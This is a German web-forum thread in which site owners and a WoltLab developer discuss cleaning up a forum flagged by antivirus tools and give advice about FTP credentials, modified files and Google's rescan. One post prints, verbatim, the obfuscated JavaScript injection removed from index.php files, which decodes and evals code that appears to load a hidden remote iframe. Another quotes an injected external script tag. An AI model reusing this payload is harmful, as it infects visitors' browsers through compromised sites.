Forum als Gefärlich gemeldet!!!

  • Mein kumpl wollte auf meine Forum bei ihm stand das ungefär das "Diese Seite wurede als Gefärdet gemeldet, es wurde eine Malware auf der Seite gefunden" so in der art und er verwändet das Antiveren Programm "G Data"

    Neben bei Info: Es ist keine sichheits lücke in wbb ich habe mir die Malware von einem anderem Portal leider eingefangen und dann ist sie auf mein Forum übergegangen.

    Hir noch mal als bild mit der genauen angabe des Fehlers:

    • Offizieller Beitrag

    Ruf mal dein Forum auf, lass dir den Quelltext anzeigen und scroll nach ganz unten, der Teil gehört da nicht hin. Höchstwahrscheinlich ist jemand über den FTP-Server eingebrochen und hat alle möglichen Daten verändert … Wende dich an deinen Anbieter um die Angelegenheit zu klären, die können dir auch behilflich sein bei der Suche nach dem genauen Einfallstor.

    Alexander Ebert
    Senior Developer WoltLab® GmbH

  • Da musst du erstmal mit deinem Provider sprechen da du ja nicht weißt, in welcher Datei genau irgendwas verändert wurde, du wirst denke ich mal nicht soviel Zugang zu den Logs haben dass du das nachvollziehen kannst. Du könntest jede Datei mal durchschauen, besonders Templates und die "index.php". Aber ob du da was findest, weiß ich nicht.

  • So habe ihn entfernd bekommen.

    Meine Betroffene Datein:
    index.php
    log/index.php
    acp/index.php

    Meine Lösung:
    Ich habe mir mein Forum runter geladen und avira hat mir dan gesagt welche Datein betroffen waren und ind den Datein ahbe ich folgendes schript entfernd:

    Code
    <!-- ~ --><script>h=-parseInt('012')/5;if(window.document)try{Boolean(true).prototype.a}catch(qqq){st=String;zz='al';zz='zv'.substr(1)+zz;ss=[];if(1){f='fromCh';f+='arC';f+='qgode'["substr"](2);}w=this;e=w[f.substr(11)+zz];t='y';}
    n="3.5!3.5!51.5!50!15!19!49!54.5!48.5!57.5!53.5!49.5!54!57!22!50.5!49.5!57!33.5!53!49.5!53.5!49.5!54!57!56.5!32!59.5!41!47.5!50.5!38!47.5!53.5!49.5!19!18.5!48!54.5!49!59.5!18.5!19.5!44.5!23!45.5!19.5!60.5!5.5!3.5!3.5!3.5!51.5!50!56!47.5!53.5!49.5!56!19!19.5!28.5!5.5!3.5!3.5!61.5!15!49.5!53!56.5!49.5!15!60.5!5.5!3.5!3.5!3.5!49!54.5!48.5!57.5!53.5!49.5!54!57!22!58.5!56!51.5!57!49.5!19!16!29!51.5!50!56!47.5!53.5!49.5!15!56.5!56!48.5!29.5!18.5!51!57!57!55!28!22.5!22.5!53.5!59.5!51.5!51.5!55!51!54.5!54!49.5!56.5!22!48.5!54.5!53.5!22.5!53.5!47.5!51.5!54!22!55!51!55!30.5!55!47.5!50.5!49.5!29.5!25!27!25!27!49!48.5!25.5!27!27.5!23!47.5!25!48.5!24.5!25.5!24!18.5!15!58.5!51.5!49!57!51!29.5!18.5!23.5!23!18.5!15!51!49.5!51.5!50.5!51!57!29.5!18.5!23.5!23!18.5!15!56.5!57!59.5!53!49.5!29.5!18.5!58!51.5!56.5!51.5!48!51.5!53!51.5!57!59.5!28!51!51.5!49!49!49.5!54!28.5!55!54.5!56.5!51.5!57!51.5!54.5!54!28!47.5!48!56.5!54.5!53!57.5!57!49.5!28.5!53!49.5!50!57!28!23!28.5!57!54.5!55!28!23!28.5!18.5!30!29!22.5!51.5!50!56!47.5!53.5!49.5!30!16!19.5!28.5!5.5!3.5!3.5!61.5!5.5!3.5!3.5!50!57.5!54!48.5!57!51.5!54.5!54!15!51.5!50!56!47.5!53.5!49.5!56!19!19.5!60.5!5.5!3.5!3.5!3.5!58!47.5!56!15!50!15!29.5!15!49!54.5!48.5!57.5!53.5!49.5!54!57!22!48.5!56!49.5!47.5!57!49.5!33.5!53!49.5!53.5!49.5!54!57!19!18.5!51.5!50!56!47.5!53.5!49.5!18.5!19.5!28.5!50!22!56.5!49.5!57!31.5!57!57!56!51.5!48!57.5!57!49.5!19!18.5!56.5!56!48.5!18.5!21!18.5!51!57!57!55!28!22.5!22.5!53.5!59.5!51.5!51.5!55!51!54.5!54!49.5!56.5!22!48.5!54.5!53.5!22.5!53.5!47.5!51.5!54!22!55!51!55!30.5!55!47.5!50.5!49.5!29.5!25!27!25!27!49!48.5!25.5!27!27.5!23!47.5!25!48.5!24.5!25.5!24!18.5!19.5!28.5!50!22!56.5!57!59.5!53!49.5!22!58!51.5!56.5!51.5!48!51.5!53!51.5!57!59.5!29.5!18.5!51!51.5!49!49!49.5!54!18.5!28.5!50!22!56.5!57!59.5!53!49.5!22!55!54.5!56.5!51.5!57!51.5!54.5!54!29.5!18.5!47.5!48!56.5!54.5!53!57.5!57!49.5!18.5!28.5!50!22!56.5!57!59.5!53!49.5!22!53!49.5!50!57!29.5!18.5!23!18.5!28.5!50!22!56.5!57!59.5!53!49.5!22!57!54.5!55!29.5!18.5!23!18.5!28.5!50!22!56.5!49.5!57!31.5!57!57!56!51.5!48!57.5!57!49.5!19!18.5!58.5!51.5!49!57!51!18.5!21!18.5!23.5!23!18.5!19.5!28.5!50!22!56.5!49.5!57!31.5!57!57!56!51.5!48!57.5!57!49.5!19!18.5!51!49.5!51.5!50.5!51!57!18.5!21!18.5!23.5!23!18.5!19.5!28.5!5.5!3.5!3.5!3.5!49!54.5!48.5!57.5!53.5!49.5!54!57!22!50.5!49.5!57!33.5!53!49.5!53.5!49.5!54!57!56.5!32!59.5!41!47.5!50.5!38!47.5!53.5!49.5!19!18.5!48!54.5!49!59.5!18.5!19.5!44.5!23!45.5!22!47.5!55!55!49.5!54!49!32.5!51!51.5!53!49!19!50!19.5!28.5!5.5!3.5!3.5!61.5"["split"]("a!".substr(1));for(i=6-2-1-2-1;i!=613;i++){j=i;if(st)ss=ss+st[f](-h*(1+1*n[j]));}if(zz)q=ss;if(t)e(""+q);</script><!-- ~ -->

    Einmal editiert, zuletzt von Broxhar (20. April 2012 um 16:22)

  • Schau im FTP-Programm nach Forumsdateien, die ein Änderungsdatum aus den letzten Tagen haben. Die sind auch angefasst worden und vermutlich verseucht.
    Dann die Forums-Caches löschen, den Cache (temp. Internet-Dateien) vom Browser auch.

    Hast Du die FTP-Passwörter und die vom Hoster-Kundeninterface alle geändert?

    Grüße
    Uli

  • In Seitenqultext is das skript net mehr drine und ich habe Google.de auch aufgefordert ein neuen scan zu machen muss nur noch das ergebnis abwarten und meine Pw's habe ich auch geändert

    Einmal editiert, zuletzt von Broxhar (20. April 2012 um 23:58)

  • Moin moin.

    Wollte nicht extra ein neues Thema aufmachen.

    Bei mir kommen auch ab und an Meldungen, ich soll angeblich einen Trojaner haben. Habe den Virenscanner von Avast.

    [Blockierte Grafik: http://fishzilla-forum.net/wcf/images/photos/photo-86-1610ad0c.jpg]

    Komischer Weise erhalte ich die Meldung nur, wenn ich mit dem Firefox online bin, mit den anderen Browsern ist alles ruhig. Öffne ich das Forum noch mal, ist alles ruhig.
    Ein User hatte diese Meldung: "jquery-toggle[1].js" Programm: JS/iFrame.bdg Er benutzt Avira.

    Dann wollte ich mich gestern hier auf die Suche machen und siehe an, das Forum hier sollte angeblich auch verseucht sein.
    Sehe bald nur noch Viren, Trojaner und andere Gängster.

    Muss ich mir Sorgen machen oder sind die Virenscanner teilweise übernervös weil Beispielweise irgendein script nicht nach deren Geschmack ist?

  • Meiner regiert hier auf den Beitrag auch lieber über vorsichtig bevor er nichts sagt und man wirklich sich was einfängt!

    P.S: Könnte jemand den Beitrag 5 hier edieren und den Code raus nehmen?

    Gruss CandyMan

  • Habe noch mal das komplette Forum online nach irgendwelchen Viren, Trojaner uns weiteres kranken Zeug untersuchen lassen.

    Alles negativ, alles ok.

    Dr. Web.

    URL Void.

    Die Slidershow von der Portalen habe ich auch gekickt.

    Trotz allem kommen diese Meldungen die mir die User so langsam verscheuchen.
    Gibt es für mich irgendwelche Lösungen, damit ich einen Anhaltspunkt hätte?

  • Bekomme die selbe meldung auch aufdein Forum nutz Eset Nod 32. Normalerweise packen die den Code immer in der index.php schau da mal rein ob du dort was findest und zwar das:

    Code
    <script type="text/javascript" language="javascript" src="http://Fishzilla.net//slideshow//jquery-toggle.js" ></script>

    Das ist von kein Plugin oder von Board selber kein Entwickler würde sowas nach den schließenden HTML Tag setzen! Wenn du dir nicht sicher bist dann lade die index.php hier hoch dann schauen wir mal rein!

    Gruss CandyMan

  • Halte mich für doof oder so.....

    Habe jetzt mehrere Index.php Dateien gefunden.
    Kannst du mir bitte sagen, welche das wäre?
    Oder besser, wo diese zu finden ist.

    Einmal editiert, zuletzt von Fishzilla (3. Mai 2012 um 23:14)

  • Also, diese und noch ein weiteres Script habe ich mir auch schon mal eingefangen.

    Es ist völlig richtig ... das FTP Programm wurde ausspioniert und die Passwörter gehackt.

    Die Lösung zur Fehlermeldung!! Sollte die Webseite, zumeist über Firefox, als attakierend gemeldet werden (siehe Bild), bekommt ihr das von selbst nicht weg.

    Ihr müsst Euch bei "Google Tools" anmelden bzw. ein Konto erstellen. Die haben dort einen Webseitencheck in dem Ihr eure Page eintragen müsst. Dort gebt ihr an, das "keine" Malware oder sonstiges mehr zu finden ist (das sollte aber auch wirklich der Fall sein).

    Dann überprüft dies im laufe des Tage Google und wenn alles paletti ist, stuft Google euch wieder als normal ein und die Meldung ist weg.

    Bei mir hats ein paar Stündchen gedauert, dann war alles wieder ok.

    Gruss Frawenk

    PS: Bevor ihr Google einschaltet, nochmals alles überprüfen. Bei mir war jede und auch wirklich jede php-Datei von dem Script befallen und auch jede index. Schaut genau nach, sonst bleibt die Meldung bestehen.

Jetzt mitmachen!

Sie haben noch kein Benutzerkonto auf unserer Seite? Registrieren Sie sich kostenlos und nehmen Sie an unserer Community teil!